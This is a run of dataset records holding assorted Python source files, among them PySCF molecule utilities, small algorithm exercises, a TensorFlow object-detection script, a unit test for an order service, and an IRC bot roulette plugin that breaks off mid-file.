bas_len_spinor(self, bas_id):\n '''The number of spinor associated with given basis\n If kappa is 0, return 4l+2\n '''\n l = self.bas_angular(bas_id)\n k = self.bas_kappa(bas_id)\n return len_spinor(l, k)\n\n def bas_len_cart(self, bas_id):\n '''The number of Cartesian function associated with given basis\n '''\n return len_cart(self._bas[bas_id,ANG_OF])\n\n\n npgto_nr = npgto_nr\n\n nao_nr = nao_nr\n nao_2c = nao_2c\n nao_cart = nao_cart\n\n nao_nr_range = nao_nr_range\n nao_2c_range = nao_2c_range\n\n ao_loc_nr = ao_loc_nr\n ao_loc_2c = ao_loc_2c\n\n def tmap(self):\n return time_reversal_map(self)\n time_reversal_map = time_reversal_map\n\n def intor(self, intor, comp=1, hermi=0, aosym='s1', out=None,\n shls_slice=None):\n '''Integral generator.\n\n Args:\n intor : str\n Name of the 1e or 2e AO integrals. Ref to :func:`getints` for the\n complete list of available 1-electron integral names\n\n Kwargs:\n comp : int\n Components of the integrals, e.g. cint1e_ipovlp has 3 components.\n hermi : int\n Symmetry of the integrals\n\n | 0 : no symmetry assumed (default)\n | 1 : hermitian\n | 2 : anti-hermitian\n\n Returns:\n ndarray of 1-electron integrals, can be either 2-dim or 3-dim, depending on comp\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; H 0 0 1.1', basis='sto-3g')\n >>> mol.intor('cint1e_ipnuc_sph', comp=3) # \n [[[ 0. 0. ]\n [ 0. 0. ]]\n [[ 0. 0. ]\n [ 0. 0. ]]\n [[ 0.10289944 0.48176097]\n [-0.48176097 -0.10289944]]]\n >>> mol.intor('cint1e_nuc')\n [[-1.69771092+0.j 0.00000000+0.j -0.67146312+0.j 0.00000000+0.j]\n [ 0.00000000+0.j -1.69771092+0.j 0.00000000+0.j -0.67146312+0.j]\n [-0.67146312+0.j 0.00000000+0.j -1.69771092+0.j 0.00000000+0.j]\n [ 0.00000000+0.j -0.67146312+0.j 0.00000000+0.j -1.69771092+0.j]]\n '''\n if 'ECP' in intor:\n assert(self._ecp is not None)\n bas = numpy.vstack((self._bas, self._ecpbas))\n self._env[PTR_ECPBAS_OFFSET] = len(self._bas)\n self._env[PTR_NECPBAS] = len(self._ecpbas)\n if shls_slice is None:\n shls_slice = (0, self.nbas, 0, self.nbas)\n else:\n bas = self._bas\n return moleintor.getints(intor, self._atm, bas, self._env,\n shls_slice, comp=comp, hermi=hermi,\n aosym=aosym, out=out)\n\n def intor_symmetric(self, intor, comp=1):\n '''One-electron integral generator. The integrals are assumed to be hermitian\n\n Args:\n intor : str\n Name of the 1-electron integral. Ref to :func:`getints` for the\n complete list of available 1-electron integral names\n\n Kwargs:\n comp : int\n Components of the integrals, e.g. cint1e_ipovlp has 3 components.\n\n Returns:\n ndarray of 1-electron integrals, can be either 2-dim or 3-dim, depending on comp\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; H 0 0 1.1', basis='sto-3g')\n >>> mol.intor_symmetric('cint1e_nuc')\n [[-1.69771092+0.j 0.00000000+0.j -0.67146312+0.j 0.00000000+0.j]\n [ 0.00000000+0.j -1.69771092+0.j 0.00000000+0.j -0.67146312+0.j]\n [-0.67146312+0.j 0.00000000+0.j -1.69771092+0.j 0.00000000+0.j]\n [ 0.00000000+0.j -0.67146312+0.j 0.00000000+0.j -1.69771092+0.j]]\n '''\n return self.intor(intor, comp, 1, aosym='s4')\n\n def intor_asymmetric(self, intor, comp=1):\n '''One-electron integral generator. The integrals are assumed to be anti-hermitian\n\n Args:\n intor : str\n Name of the 1-electron integral. Ref to :func:`getints` for the\n complete list of available 1-electron integral names\n\n Kwargs:\n comp : int\n Components of the integrals, e.g. cint1e_ipovlp has 3 components.\n\n Returns:\n ndarray of 1-electron integrals, can be either 2-dim or 3-dim, depending on comp\n\n Examples:\n\n >>> mol.build(atom='H 0 0 0; H 0 0 1.1', basis='sto-3g')\n >>> mol.intor_asymmetric('cint1e_nuc')\n [[-1.69771092+0.j 0.00000000+0.j 0.67146312+0.j 0.00000000+0.j]\n [ 0.00000000+0.j -1.69771092+0.j 0.00000000+0.j 0.67146312+0.j]\n [-0.67146312+0.j 0.00000000+0.j -1.69771092+0.j 0.00000000+0.j]\n [ 0.00000000+0.j -0.67146312+0.j 0.00000000+0.j -1.69771092+0.j]]\n '''\n return self.intor(intor, comp, 2, aosym='a4')\n\n @pyscf.lib.with_doc(moleintor.getints_by_shell.__doc__)\n def intor_by_shell(self, intor, shells, comp=1):\n if 'ECP' in intor:\n assert(self._ecp is not None)\n bas = numpy.vstack((self._bas, self._ecpbas))\n self._env[PTR_ECPBAS_OFFSET] = len(self._bas)\n self._env[PTR_NECPBAS] = len(self._ecpbas)\n else:\n bas = self._bas\n return moleintor.getints_by_shell(intor, shells, self._atm, bas,\n self._env, comp)\n\n @pyscf.lib.with_doc(eval_gto.__doc__)\n def eval_gto(self, eval_name, coords,\n comp=1, shls_slice=None, non0tab=None, out=None):\n return eval_gto(eval_name, self._atm, self._bas, self._env,\n coords, comp, shls_slice, non0tab, out)\n\n def energy_nuc(self):\n return energy_nuc(self)\n def get_enuc(self):\n return self.energy_nuc()\n\n @pyscf.lib.with_doc(cart_labels.__doc__)\n def cart_labels(self, fmt=False):\n return cart_labels(self, fmt)\n\n @pyscf.lib.with_doc(spheric_labels.__doc__)\n def spheric_labels(self, fmt=False):\n return spheric_labels(self, fmt)\n\n def search_shell_id(self, atm_id, l):\n return search_shell_id(self, atm_id, l)\n\n search_ao_nr = search_ao_nr\n search_ao_r = search_ao_r\n\n offset_nr_by_atom = offset_nr_by_atom\n offset_2c_by_atom = offset_2c_by_atom\n\n @pyscf.lib.with_doc(spinor_labels.__doc__)\n def spinor_labels(self):\n return spinor_labels(self)\n\n condense_to_shell = condense_to_shell\n\n __add__ = conc_mol\n\n_ELEMENTDIC = dict((k.upper(),v) for k,v in param.ELEMENTS_PROTON.items())\n\ndef _rm_digit(symb):\n if symb.isalpha():\n return symb\n else:\n return ''.join([i for i in symb if i.isalpha()])\n\ndef _charge(symb_or_chg):\n if isinstance(symb_or_chg, str):\n return param.ELEMENTS_PROTON[_rm_digit(symb_or_chg)]\n else:\n return symb_or_chg\n\ndef _symbol(symb_or_chg):\n if isinstance(symb_or_chg, str):\n return symb_or_chg\n else:\n return param.ELEMENTS[symb_or_chg][0]\n\ndef _std_symbol(symb_or_chg):\n if isinstance(symb_or_chg, str):\n rawsymb = _rm_digit(symb_or_chg)\n return param.ELEMENTS[_ELEMENTDIC[rawsymb.upper()]][0]\n else:\n return param.ELEMENTS[symb_or_chg][0]\n\ndef _parse_nuc_mod(str_or_int):\n if isinstance(str_or_int, int):\n return str_or_int\n elif 'G' in str_or_int.upper(): # 'gauss_nuc'\n return NUC_GAUSS\n else:\n return NUC_POINT\n\ndef _update_from_cmdargs_(mol):\n # Ipython shell conflicts with optparse\n # pass sys.args when using ipython\n try:\n __IPYTHON__\n sys.stderr.write('Warn: Ipython shell catchs sys.args\\n')\n return None\n except:\n pass\n\n if not mol._built: # parse cmdline args only once\n opts = cmd_args.cmd_args()\n\n if opts.verbose:\n mol.verbose = opts.verbose\n if opts.max_memory:\n mol.max_memory = opts.max_memory\n\n if opts.output:\n mol.output = opts.output\n\n if mol.output is not None:\n if os.path.isfile(mol.output):\n #os.remove(mol.output)\n if mol.verbose > logger.QUIET:\n print('overwrite output file: %s' % mol.output)\n else:\n if mol.verbose > logger.QUIET:\n print('output file: %s' % mol.output)\n\n\ndef from_zmatrix(atomstr):\n '''>>> a = \"\"\"H\n H 1 2.67247631453057\n H 1 4.22555607338457 2 50.7684795164077\n H 1 2.90305235726773 2 79.3904651036893 3 6.20854462618583\"\"\"\n >>> for x in zmat2cart(a): print x\n ['H', array([ 0., 0., 0.])]\n ['H', array([ 2.67247631, 0. , 0. ])]\n ['H', array([ 2.67247631, 0. , 3.27310166])]\n ['H', array([ 0.53449526, 0.30859098, 2.83668811])]\n '''\n import pyscf.symm\n atomstr = atomstr.replace(';','\\n').replace(',',' ')\n atoms = []\n for line in atomstr.split('\\n'):\n if line.strip():\n rawd = line.split()\n if len(rawd) < 3:\n atoms.append([rawd[0], numpy.zeros(3)])\n elif len(rawd) == 3:\n atoms.append([rawd[0], numpy.array((float(rawd[2]), 0, 0))])\n elif len(rawd) == 5:\n bonda = int(rawd[1]) - 1\n bond = float(rawd[2])\n anga = int(rawd[3]) - 1\n ang = float(rawd[4])/180*numpy.pi\n v1 = atoms[anga][1] - atoms[bonda][1]\n if not numpy.allclose(v1[:2], 0):\n vecn = numpy.cross(v1, numpy.array((0.,0.,1.)))\n else: # on z\n vecn = numpy.array((0.,0.,1.))\n rmat = pyscf.symm.rotation_mat(vecn, ang)\n c = numpy.dot(rmat, v1) * (bond/numpy.linalg.norm(v1))\n atoms.append([rawd[0], atoms[bonda][1]+c])\n else: # FIXME\n bonda = int(rawd[1]) - 1\n bond = float(rawd[2])\n anga = int(rawd[3]) - 1\n ang = float(rawd[4])/180*numpy.pi\n diha = int(rawd[5]) - 1\n dih = float(rawd[6])/180*numpy.pi\n v1 = atoms[anga][1] - atoms[bonda][1]\n v2 = atoms[diha][1] - atoms[anga][1]\n vecn = numpy.cross(v2, -v1)\n rmat = pyscf.symm.rotation_mat(v1, -dih)\n vecn = numpy.dot(rmat, vecn) / numpy.linalg.norm(vecn)\n rmat = pyscf.symm.rotation_mat(vecn, ang)\n c = numpy.dot(rmat, v1) * (bond/numpy.linalg.norm(v1))\n atoms.append([rawd[0], atoms[bonda][1]+c])\n return atoms\nzmat2cart = zmat = from_zmatrix\n\ndef cart2zmat(coord):\n '''>>> c = numpy.array((\n (0.000000000000, 1.889726124565, 0.000000000000),\n (0.000000000000, 0.000000000000, -1.889726124565),\n (1.889726124565, -1.889726124565, 0.000000000000),\n (1.889726124565, 0.000000000000, 1.133835674739)))\n >>> print cart2zmat(c)\n 1\n 1 2.67247631453057\n 1 4.22555607338457 2 50.7684795164077\n 1 2.90305235726773 2 79.3904651036893 3 6.20854462618583\n '''\n zstr = []\n zstr.append('1')\n if len(coord) > 1:\n r1 = coord[1] - coord[0]\n nr1 = numpy.linalg.norm(r1)\n zstr.append('1 %.15g' % nr1)\n if len(coord) > 2:\n r2 = coord[2] - coord[0]\n nr2 = numpy.linalg.norm(r2)\n a = numpy.arccos(numpy.dot(r1,r2)/(nr1*nr2))\n zstr.append('1 %.15g 2 %.15g' % (nr2, a*180/numpy.pi))\n if len(coord) > 3:\n o0, o1, o2 = coord[:3]\n p0, p1, p2 = 1, 2, 3\n for k, c in enumerate(coord[3:]):\n r0 = c - o0\n nr0 = numpy.linalg.norm(r0)\n r1 = o1 - o0\n nr1 = numpy.linalg.norm(r1)\n a1 = numpy.arccos(numpy.dot(r0,r1)/(nr0*nr1))\n b0 = numpy.cross(r0, r1)\n nb0 = numpy.linalg.norm(b0)\n\n if abs(nb0) < 1e-7: # o0, o1, c in line\n a2 = 0\n zstr.append('%d %.15g %d %.15g %d %.15g' %\n (p0, nr0, p1, a1*180/numpy.pi, p2, a2))\n else:\n b1 = numpy.cross(o2-o0, r1)\n nb1 = numpy.linalg.norm(b1)\n\n if abs(nb1) < 1e-7: # o0 o1 o2 in line\n a2 = 0\n zstr.append('%d %.15g %d %.15g %d %.15g' %\n (p0, nr0, p1, a1*180/numpy.pi, p2, a2))\n o2 = c\n p2 = 4 + k\n else:\n if numpy.dot(numpy.cross(b1, b0), r1) < 0:\n a2 = numpy.arccos(numpy.dot(b1, b0) / (nb0*nb1))\n else:\n a2 =-numpy.arccos(numpy.dot(b1, b0) / (nb0*nb1))\n zstr.append('%d %.15g %d %.15g %d %.15g' %\n (p0, nr0, p1, a1*180/numpy.pi, p2, a2*180/numpy.pi))\n\n return '\\n'.join(zstr)\n\ndef dyall_nuc_mod(mass, c=param.LIGHTSPEED):\n ''' Generate the nuclear charge distribution parameter zeta\n rho(r) = nuc_charge * Norm * exp(-zeta * r^2)\n\n Ref. L. Visscher and K. Dyall, At. Data Nucl. Data Tables, 67, 207 (1997)\n '''\n r = (0.836 * mass**(1./3) + 0.570) / 52917.7249;\n zeta = 1.5 / (r**2);\n return zeta\n\ndef filatov_nuc_mod(nuc_charge, c=param.LIGHTSPEED):\n ''' Generate the nuclear charge distribution parameter zeta\n rho(r) = nuc_charge * Norm * exp(-zeta * r^2)\n\n Ref. M. Filatov and D. Cremer, Theor. Chem. Acc. 108, 168 (2002)\n M. Filatov and D. Cremer, Chem. Phys. Lett. 351, 259 (2002)\n '''\n if isinstance(nuc_charge, str):\n nuc_charge = _charge(nuc_charge)\n r = (-0.263188*nuc_charge + 106.016974 + 138.985999/nuc_charge) / c**2\n zeta = 1 / (r**2)\n return zeta\n\n","repo_name":"sunchong137/pyscf_2017","sub_path":"gto/mole.py","file_name":"mole.py","file_ext":"py","file_size_in_byte":87671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"15718211080","text":"def search(arr, target):\n l, r = 0, len(arr) - 1\n while l <= r:\n mid = (l + r) // 2\n if arr[mid] == target:\n return True\n elif arr[mid] > target:\n r = mid - 1\n else:\n l = mid + 1\n return False\n\n\nif __name__ == '__main__':\n n = int(input())\n arr_1 = list(map(int, input().split()))\n q = int(input())\n arr_2 = list(map(int, input().split()))\n ans = 0\n for element in arr_2:\n if search(arr_1, element):\n ans += 1\n print(ans)\n","repo_name":"xiaolinzi-xl/challenge-programming-competition-2","sub_path":"chapter_5/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"22192153296","text":"import tensorflow as tf\nimport numpy as np\n\nclass TensorFlow:\n def run(self):\n num1 = np.array([1,2,3])\n num2 = np.array([1,2,3])\n \n input1 = tf.constant(num1);\n input2 = tf.constant(num2);\n \n result = input1 + input2;\n \n with tf.Session() as sess :\n init = tf.global_variables_initializer()\n sess.run(init)\n return sess.run(result)\n\t\t\t\n\ntensorflow = TensorFlow()\nprint(tensorflow.run())","repo_name":"sonusinghrajput11/Machine-Learning","sub_path":"TensorFlow Building Blocks (Examples)/tf_constant.py","file_name":"tf_constant.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"19360221007","text":"\n# simulation settings\nPOP_SIZE = 5000 # cohort population size\nN_COHORTS = 20\nSIM_LENGTH = 10*52 # length of simulation (years)\n#SIM_LENGTH = 1*52 # length of simulation (years)\nALPHA = 0.05 # significance level for calculating confidence intervals\nDISCOUNT = 0.03 # annual discount rate\n\n# # annual probability of background mortality (number per year per 1,000 population)\n# ANNUAL_PROB_BACKGROUND_MORT = 8.15 / 1000\n\n# rate transition matrix\n# CONSIDER MAKING CLEARED_TBM WITH A LOWER HEALTH UTILITY GIVEN ADVERSE SEQUELAE OF TBM\n# SOC_RATE_TRANS_MATRIX = [\n# [0, 1/160, 7/480, 1/48, 0, 1/24, 0], # INFECTED\n# [0, 0, 0, 141/250, 109/250, 0, 0], # HOSP_TBD\n# [0, 0, 0, 0, 109/250, 0, 141/250], # HOSP_TBM\n# [0, 0, 0, 0, 3/8000, 991/24000, 0], # DX_TBD\n# [0, 0, 0, 0, 0, 0, 0], # DEAD\n# [0, 0, 0, 0,1/(62.77*52), 0, 0], # CLEARED\n# [0, 0, 0, 0, 193/24000, 269/8000, 0] # DX_TBM\n# ]\n\n# average time spent in each state (given in the unit weeks)\nT_INF = 12\nT_HOSP_TBD = 1\nT_HOSP_TBM = 2\nT_DX_TBD = 24\nT_DX_TBM = 24\nT_CLEARED = 62.77*52\n\n# probability of input parameters to determine the rate_transition_matrix\n# assumptions that diagnostic yield is the most important piece of information\nP_DX_SOC = 0.29 # (alpha) diagnostic yield of investigations\nP_DX_NSB = 0.52 # (.4-.9) (alpha) diagnostic yield of investigations (NSB)\n\n# assumptions that death in the hospital is the same for both states\nP_DEATH_IN_HOSP = 0.436 # (0.368-0.506) (beta) probability of death in the hospital (relationship w/ alpha)\n # from Jenkins; probability of dying within 1 year of diagnosis\n\nP_INFECTED_CLEARED = 0.5\nP_INFECTED_TBM = 0.15 # (0.1-0.2)\nP_INFECTED_TBD = 0.35 # (0.3-0.4)\n\nP_DX_TBD_DEATH = 0.009 # (0.5-1.6) probability of death in DX_TBD state (on treatment with TBD)\nP_DX_TBM_DEATH = 0.193 # (0.14-0.261) probability of death in DX_TBM state (on treatment with TBM)\n\n# NEED TO UPDATE NSB RATE TRANS MATRIX\n# NSB_RATE_TRANS_MATRIX = [\n# [0, XXX, XXX, XXX, 0, XXX], # INFECTED\n# [0, 0, 0, XXX, XXX, 0], # HOSP_TBD\n# [0, 0, 0, XXX, XXX, 0], # HOSP_TBM\n# [0, 0, 0, 0, XXX, XXX], # DX_TB\n# [0, 0, 0, 0, 0, 0], # DEAD\n# [0, 0, 0, 0, XXX, 0], # CLEARED\n# [0, 0, 0, 0, XXX, 0]\n# ]\n\n# NEED TO INPUT WEEKLY COST OF EACH HEALTH STATE\n# annual cost of each health state\nWEEKLY_STATE_COST = [\n 0, # INFECTED\n 392, # HOSP_TBD\n 392, # HOSP_TBM\n 1.75, # DX_TBD\n 0, # DEAD\n 0, # CLEARED\n 1.75 # DX_TBM\n]\n# NEED TO INPUT HEALTH UTILITY OF EACH HEALTH STATE????\n# annual health utility of each health state\n# WEEKLY_STATE_UTILITY = [\n# 0, # INFECTED # cost of medicines, doctors appointments, etc\n# 0, # HOSP_TBD # costs associated with hospitalization associated with TBD\n# 0, # HOSP_TBM # costs associated with hospitalization for TBM\n# 0, # DEAD # no costs\n# 0, # CLEARED # no costs\n# 0\n# ]\n\n# Diagnostic Costs associated with SOC vs. NSB\n# one time costs associated with the diagnosis of TB at the infected, hosp_tbd, hosp_tbm states\nSOC_ONE_TIME_COST = [\n 0, # INFECTED (charged only when the patient goes from INFECTED to DX)\n 98, # HOSP_TBD\n 98, # HOSP_TBM\n 15, # DX_TBD\n 0, # DEAD\n 0, # CLEARED\n 15 # DX_TBM\n]\n\nNSB_ONE_TIME_COST = [\n 0, # INFECTED (charged only when the patient goes from INFECTED to DX)\n 98, # HOSP_TBD\n 98, # HOSP_TBM\n 15 + 3, # DX_TBD\n 0, # DEAD\n 0, # CLEARED\n 15 + 3 # DX_TBM\n]\n","repo_name":"kennyguna/urine_LAM_model","sub_path":"InputData.py","file_name":"InputData.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2982268893","text":"T = int(raw_input())\n\nfor t in range(T):\n \n max_probability = 0\n\n H, S = map(int, raw_input().split())\n dices = raw_input().split()\n\n for dice in dices:\n is_negative = (dice.find('-') != -1)\n has_z = (dice.find('+') != -1) or (dice.find('-') != -1)\n\n dice = dice.replace('+', ' ')\n dice = dice.replace('-', ' ')\n dice = dice.replace('d', ' ')\n\n X = 0\n Y = 0\n Z = 0\n\n if has_z:\n X, Y, Z = map(int, dice.split())\n\n if is_negative:\n Z = Z * -1\n\n else:\n X, Y = map(int, dice.split())\n\n MAX_SUM = X * Y + 1\n\n count = [[0] * MAX_SUM for _ in range(X + 1)]\n count[0][0] = 1\n\n for x in range(X):\n for i in range(MAX_SUM):\n for y in range(Y):\n if (i + y + 1) < MAX_SUM:\n count[x + 1][i + y + 1] += count[x][i];\n\n over_count = 0\n total_count = 0\n \n for i in range(MAX_SUM):\n total_count += count[X][i];\n if ((i + Z) >= H):\n over_count += count[X][i];\n\n\n probability = over_count / (float)(total_count);\n max_probability = max(probability, max_probability);\n \n print('Case #%d: %.6f' % (t + 1, max_probability))\n","repo_name":"tobygameac/Problem-Solving","sub_path":"Facebook Hacker Cup/2017/Qualification Round/Fighting the Zombie.py","file_name":"Fighting the Zombie.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"317560272","text":"import unittest\n\nimport sqlite3\nfrom typing import Tuple\nfrom datetime import datetime\n\nfrom order_service.order.persistence import create_order\nfrom order_service.order import db\nfrom order_service.order.model import Order, OrderItem\n\nclass TestPersistence(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.conn = sqlite3.connect(':memory:')\n db.init_db(cls.conn)\n \n def test_create_order(self):\n order = Order(\n customer_id=2,\n customer_name='Tansinee T.',\n is_member=True,\n items=[\n OrderItem(product_id=3, amount=15, price_per_unit=10.0),\n OrderItem(product_id=4, amount=13, price_per_unit=5.0)\n ]\n )\n\n new_order = create_order(order, self.conn)\n order_id = new_order.order_id\n\n actual_order, actual_items = self._load_order(order_id)\n self.assert_order(order, actual_order)\n assert len(order.items) == len(actual_items)\n for order_item, acutal_item in zip(order.items, actual_items):\n self.assert_order_item(order_item, acutal_item)\n\n def _load_order(self, order_id):\n cursor = self.conn.cursor()\n cursor.execute('SELECT customer_id, customer_name, is_member, date FROM orders WHERE id = ?', \n (order_id,))\n order = cursor.fetchone()\n\n cursor.execute('SELECT product_id, amount, price_per_unit FROM order_items WHERE order_id = ?', \n (order_id,))\n order_items = cursor.fetchall()\n\n return order, order_items\n\n def assert_order(self, expected: Order, db_actual: Tuple):\n assert db_actual[0] == expected.customer_id\n assert db_actual[1] == expected.customer_name\n assert db_actual[2] == expected.is_member\n assert datetime.strptime(db_actual[3], '%Y-%m-%d %H:%M:%S.%f') == expected.date\n \n def assert_order_item(self, expected: OrderItem, db_actual: Tuple):\n assert db_actual[0] == expected.product_id\n assert db_actual[1] == expected.amount\n assert db_actual[2] == expected.price_per_unit\n\n @classmethod\n def tearDownClass(cls):\n cls.conn.close()\n","repo_name":"webscal3r/kafka201","sub_path":"python/order_service/tests/persistence/test_create_order.py","file_name":"test_create_order.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6871659196","text":"#Importing all the libraries that is required to run this Object Detection API:\r\n\r\nimport numpy as np\r\nimport os\r\nimport six.moves.urllib as urllib\r\nimport sys\r\nimport tarfile\r\nimport tensorflow as tf\r\nimport zipfile\r\nimport pathlib\r\nfrom collections import defaultdict\r\nfrom io import StringIO\r\nfrom matplotlib import pyplot as plt\r\nfrom PIL import Image\r\nfrom IPython.display import display\r\n\r\n# This are the libraries which we need to import to use this Object Detection API given by Tensorflow(set the path of object_detection folder correctly):\r\n\r\nfrom object_detection.utils import ops as utils_ops\r\nfrom object_detection.utils import label_map_util\r\nfrom object_detection.utils import visualization_utils as vis_util\r\n\r\n \r\nwhile \"models\" in pathlib.Path.cwd().parts:\r\n os.chdir('..')\r\n\r\n# We have created a fuction load_model To load the model and save it on the system:\r\n\r\ndef loading_model(model_name):\r\n base_url = 'http://download.tensorflow.org/models/object_detection/'\r\n model_file = model_name + '.tar.gz'\r\n model_dir = tf.keras.utils.get_file(\r\n fname=model_name, \r\n origin=base_url + model_file,\r\n untar=True)\r\n \r\n model_dir = pathlib.Path(model_dir)/\"saved_model\"\r\n \r\n model = tf.saved_model.load(str(model_dir))\r\n \r\n return model\r\n\r\n# set the path of label file and Load label map data (for plotting):\r\nlabels_path = 'models/research/object_detection/data/mscoco_label_map.pbtxt'\r\ncategory_index = label_map_util.create_category_index_from_labelmap(labels_path , use_display_name=True)\r\n\r\n\r\n###To download Labels Manually:\r\n# def downloading_labels(filename):\r\n# base_url = 'https://raw.githubusercontent.com/tensorflow/models/master/research/object_detection/data/'\r\n# label_dir = tf.keras.utils.get_file(fname=filename,\r\n# origin=base_url + filename,\r\n# untar=False)\r\n# label_dir = pathlib.Path(label_dir)\r\n# return str(label_dir)\r\n\r\n# label_filename = 'mscoco_label_map.pbtxt'\r\n# labels_path= download_labels(label_filename)\r\n\r\n# category_index = label_map_util.create_category_index_from_labelmap(labels_path, use_display_name=True)\r\n\r\n\r\n# In this we are loading the model(you can choose model according to your system , the name of available models is shown above):\r\n\r\n# select the model and load the model:\r\nmodel = 'ssd_inception_v2_coco_2017_11_17'\r\nmodel = load_model(model)\r\n\r\n\r\n# Now we will run the model for single image:\r\n\r\n# Now we will run the model for single image:\r\n\r\ndef run_model_for_single_image(model,image):\r\n #converting image to array:\r\n image = np.asarray(image)\r\n \r\n #converting the image into tensor(as input should be a tensor):\r\n tensor_image = tf.convert_to_tensor(image)\r\n \r\n \r\n tensor_image = tensor_image[tf.newaxis,...]\r\n \r\n # Run model:\r\n model_fn = model.signatures['serving_default']\r\n result_dict = model_fn(tensor_image)\r\n \r\n #detecting\r\n detections = int(result_dict.pop('num_detections'))\r\n result_dict = {key:value[0,:detections].numpy() for key,value in result_dict.items()}\r\n result_dict['num_detections'] = detections\r\n \r\n # convert detection_classes to int\r\n result_dict['detection_classes'] = result_dict['detection_classes'].astype(np.int64)\r\n \r\n \r\n if 'detection_masks' in result_dict:\r\n # we have to set that mask according to the size of image:\r\n modified_detection_masks = utils_ops.reframe_box_masks_to_image_masks(\r\n result_dict['detection_masks'], result_dict['detection_boxes'],\r\n image.shape[0], image.shape[1])\r\n modified_detection_masks = tf.cast(modified_detection_masks > 0.5,tf.uint8)\r\n \r\n result_dict['modified_detection_masks'] = modified_detection_masks.numpy()\r\n \r\n return result_dict\r\n\r\n\r\n\r\n# now we will create a function to show this model:\r\ndef model_show(model, image_path):\r\n image = np.array(Image.open(image_path))\r\n \r\n # Actual detection:\r\n result_dict = run_model_for_single_image(model,image)\r\n \r\n # Visualize the Detection:\r\n vis_util.visualize_boxes_and_labels_on_image_array(\r\n image,\r\n result_dict['detection_boxes'],\r\n result_dict['detection_classes'],\r\n result_dict['detection_scores'],\r\n category_index,\r\n instance_masks=result_dict.get('modified_detection_masks', None),\r\n use_normalized_coordinates=True,\r\n line_thickness=8)\r\n \r\n display(Image.fromarray(image))\r\n\r\n# Set path to test image directory: \r\n\r\ntest_path= pathlib.Path('models/research/object_detection/test_images')\r\ntest_path= sorted(list(test_path.glob(\"*.jpg\")))\r\n\r\n# run model for this test images one by one:\r\n\r\nfor image_path in test_path:\r\n print(image_path)\r\n model_show(model, image_path)\r\n \r\n","repo_name":"SogAniMic/objects_detections-machine-learning","sub_path":"Object_detection_tensorflow.py","file_name":"Object_detection_tensorflow.py","file_ext":"py","file_size_in_byte":4800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74090778291","text":"from django.core.exceptions import ValidationError\nfrom datetime import datetime\n\n\ndef validate_start_date(value):\n print(value)\n start = datetime.strftime(value, '%y-%m-%d')\n current = datetime.strftime(datetime.today(), '%y-%m-%d')\n if start < current:\n raise ValidationError(f\"Start date is incorrect\")\n","repo_name":"d1squit/django_lms","sub_path":"groups/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27619868600","text":"\ndef sort_012(a):\n \"\"\"\n Given an array consisting of only 0, 1, and 2, sort the array in a single traversal\n\n \"\"\"\n low = 0\n mid = 0\n high = len(a) - 1\n\n while mid <= high:\n if a[mid] == 0:\n a[low], a[mid] = a[mid], a[low]\n low += 1\n mid += 1\n elif a[mid] == 1:\n mid += 1\n else:\n a[mid], a[high] = a[high], a[mid]\n high -= 1\n return a\n\n\n# TEST CASE 1\nl1 = [0, 0, 2, 2, 2, 1, 1, 1, 2, 0, 2]\nprint(sort_012(l1))\n# should print [0, 0, 0, 1, 1, 1, 2, 2, 2, 2, 2]\n\n# TEST CASE 2\nl2 = [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2]\nprint(sort_012(l2))\n# should print [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2]\n\n# TEST CASE 3\nl3 = [0]\nprint(sort_012(l3))\n# should print [0]\n","repo_name":"damclaugh/udacity_data_structures_algorithms","sub_path":"problems_v_algorithms_project/problem_4.py","file_name":"problem_4.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"808372295","text":"# coding=utf-8\nimport random\nfrom system.yaml_loader import *\n\nfrom system.decorators import *\n\nclass plugin(object):\n \"\"\"\n Play russian roulette, the safe way!\n \"\"\"\n\n commands = {\n \"rroulette\": \"play\",\n \"rstats\": \"getstats\",\n \"shoot\": \"shoot\"\n }\n\n hooks = {\n \"connectionLost\": \"save\",\n \"signedOn\": \"load\",\n \"channelJoined\": \"newChannel\"\n }\n\n shoot_guns = [\n [\"shoots {$USER}\", \"Bang!\"],\n [\"torches {$USER}\", \"HMMM MMH MMMPH!\"],\n [\"fills {$USER} with bulletholes\", \"RAT-A-TAT-TAT!\"],\n [\"throws a monitor at {$USER}\", \"HAAAAAAX!\"],\n [\"touches {$USER} in the back with a knife. Hard.\", \"That bot is a spah!\"],\n [\"releases the hounds on {$USER}\", \"Excellent...\"],\n [\"points a magic wand at {$USER}\", \"EXPELLIARMOUS!\"],\n [\"Eeee...\", \"...nope.\"],\n [\"throws a stick of dynamite at {$USER}\", \"BOOOM!\"],\n [\"throws Sascha at {$USER}\", \"NOBODY TOUCHES MY GUN!\"],\n [\"throws a bowling ball at {$USER}\", \"Hey! Cousin! Want to go bowling?\"],\n [\"sets {$USER} as the bomb\", \"All your kicks are belong to us\"],\n [\"fires the lazor at {$USER}\", \"BLAAAAAAAAAAAAAAAAARGGHHH!\"],\n [\"fires the trolling ray at {$USER}\", \"TROLOLOLOLOL\"],\n [\"rickrolls {$USER}\", \"NEVER GONNA GIVE YOU UP, NEVER GONNA LET YOU DOWN\"],\n [\"places a 